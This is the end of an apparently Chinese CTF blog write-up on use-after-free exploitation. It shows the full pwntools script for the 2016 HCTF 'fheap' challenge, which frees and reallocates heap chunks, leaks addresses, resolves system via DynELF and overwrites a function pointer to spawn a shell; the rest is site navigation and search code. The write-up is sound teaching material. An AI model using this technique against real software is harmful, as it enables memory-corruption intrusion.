class="hljs-keyword">print</span> hex(u64(data.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">‘\x00’</span>)))<br>    <span class="hljs-keyword">return</span> data<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">main</span><span class="hljs-params">()</span>:</span><br>    <span class="hljs-keyword">global</span> printf_addr<span class="hljs-comment">#set global printf addr cus leak() use it </span><br>    <span class="hljs-comment">#step 1 create &amp; delete</span><br>    create_str(<span class="hljs-number">4</span>,<span class="hljs-string">‘aa’</span>)<br>    create_str(<span class="hljs-number">4</span>,<span class="hljs-string">‘aa’</span>)<br>    delete_str(<span class="hljs-number">1</span>)<br>    delete_str(<span class="hljs-number">0</span>)<br>    <span class="hljs-comment">#step 2 recover old function addr</span><br>    pwn = ELF(<span class="hljs-string">‘./pwn-f’</span>)<br>    payload = <span class="hljs-string">“aaaaaaaa”</span>.ljust(<span class="hljs-number">0x18</span>,<span class="hljs-string">‘b’</span>)+<span class="hljs-string">‘\x2d’</span><span class="hljs-comment"># recover low bits,the reason why i choose \x2d is that the system flow decide by</span><br>    create_str(<span class="hljs-number">0x20</span>,payload)<br>    delete_str(<span class="hljs-number">1</span>)<br>    <span class="hljs-comment">#step 3 leak base addr</span><br>    sh.recvuntil(<span class="hljs-string">‘b’</span>*<span class="hljs-number">0x10</span>)<br>    data = sh.recvuntil(<span class="hljs-string">‘\n’</span>)[:-<span class="hljs-number">1</span>]<br>    <span class="hljs-keyword">if</span> len(data)&gt;<span class="hljs-number">8</span>:<br>        data=data[:<span class="hljs-number">8</span>]<br>    data = u64(data.ljust(<span class="hljs-number">0x8</span>,<span class="hljs-string">‘\x00’</span>))<span class="hljs-comment"># leaked puts address use it to calc base addr</span><br>    base_addr = data - <span class="hljs-number">0xd2d</span><br>    <span class="hljs-comment">#step 4 get printf func addr</span><br>    printf_offset = pwn.plt[<span class="hljs-string">‘printf’</span>]<br>    printf_addr = base_addr + printf_offset <span class="hljs-comment">#get real printf addr</span><br>    delete_str(<span class="hljs-number">0</span>)<br>    <span class="hljs-comment">#step 5 leak system addr</span><br>    create_str(<span class="hljs-number">0x20</span>,payload)<br>    delete_str(<span class="hljs-number">1</span>)<span class="hljs-comment">#this one can not be ignore because DynELF use the delete_str() at begin     </span><br>    d = DynELF(leak, base_addr, elf=ELF(<span class="hljs-string">‘./pwn-f’</span>))<br>    system_addr = d.lookup(<span class="hljs-string">‘system’</span>, <span class="hljs-string">‘libc’</span>)<br>    <span class="hljs-keyword">print</span> <span class="hljs-string">‘system_addr:’</span>+hex(system_addr)<br><br>    <span class="hljs-comment">#step 6 recover old function to system then get shell</span><br>    delete_str(<span class="hljs-number">0</span>)<br>    create_str(<span class="hljs-number">0x20</span>,<span class="hljs-string">‘/bin/bash;’</span>.ljust(<span class="hljs-number">0x18</span>,<span class="hljs-string">‘#’</span>)+p64(system_addr))<span class="hljs-comment">#attention /bin/bash; i don`t not why add the ‘;’</span><br>    delete_str(<span class="hljs-number">1</span>)<br>    sh.interactive()<br><span class="hljs-keyword">if</span> <strong>name</strong> == <span class="hljs-string">‘<strong>main</strong>‘</span>:<br>    <span class="hljs-keyword">print</span> <span class="hljs-number">1</span><br>    main()</code></pre></div>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Linux/" rel="tag"># Linux</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/06/16/验证码机制与实现/" rel="next" title="验证码机制与实现">
                <i class="fa fa-chevron-left"></i> 验证码机制与实现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/06/24/pwnable dragon/" rel="prev" title="pwnable dragon">
                pwnable dragon <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/qq.jpg"
                alt="4ct10n" />
            
              <p class="site-author-name" itemprop="name">4ct10n</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">55</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/actionyz" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:act01n@163.com" target="_blank" title="E-Mail">
                    
                      <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://www.google.com" target="_blank" title="Google">
                    
                      <i class="fa fa-fw fa-google"></i>Google</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="1792034533" target="_blank" title="QQ">
                    
                      <i class="fa fa-fw fa-QQ"></i>QQ</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://example.com/" title="Title" target="_blank">Title</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-uaf-原理"><span class="nav-number">1.</span> <span class="nav-text">0x01 UAF 原理</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-漏洞的简单利用"><span class="nav-number">2.</span> <span class="nav-text">0x02 漏洞的简单利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-2016hctf-fheap"><span class="nav-number">3.</span> <span class="nav-text">0x03 2016HCTF fheap</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1-题目分析"><span class="nav-number">3.1.</span> <span class="nav-text">0x1 题目分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x2-申请释放-代码"><span class="nav-number">3.2.</span> <span class="nav-text">0x2 申请&释放 代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x3-uaf漏洞查找"><span class="nav-number">3.3.</span> <span class="nav-text">0x3 UAF漏洞查找</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x4-利用uaf修改函数地址"><span class="nav-number">3.4.</span> <span class="nav-text">0x4 利用UAF修改函数地址</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1fastbin特性"><span class="nav-number">3.4.1.</span> <span class="nav-text">1.fastbin特性</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2内存分布"><span class="nav-number">3.4.2.</span> <span class="nav-text">2.内存分布</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x5-泄露基址"><span class="nav-number">3.5.</span> <span class="nav-text">0x5 泄露基址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6格式化字符串"><span class="nav-number">3.6.</span> <span class="nav-text">6.格式化字符串</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x7-泄露system地址并使用"><span class="nav-number">3.7.</span> <span class="nav-text">0x7 泄露system地址并使用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x8-完整代码"><span class="nav-number">3.8.</span> <span class="nav-text">0x8 完整代码</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">4ct10n</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
  

  

  

  

</body>
</html>
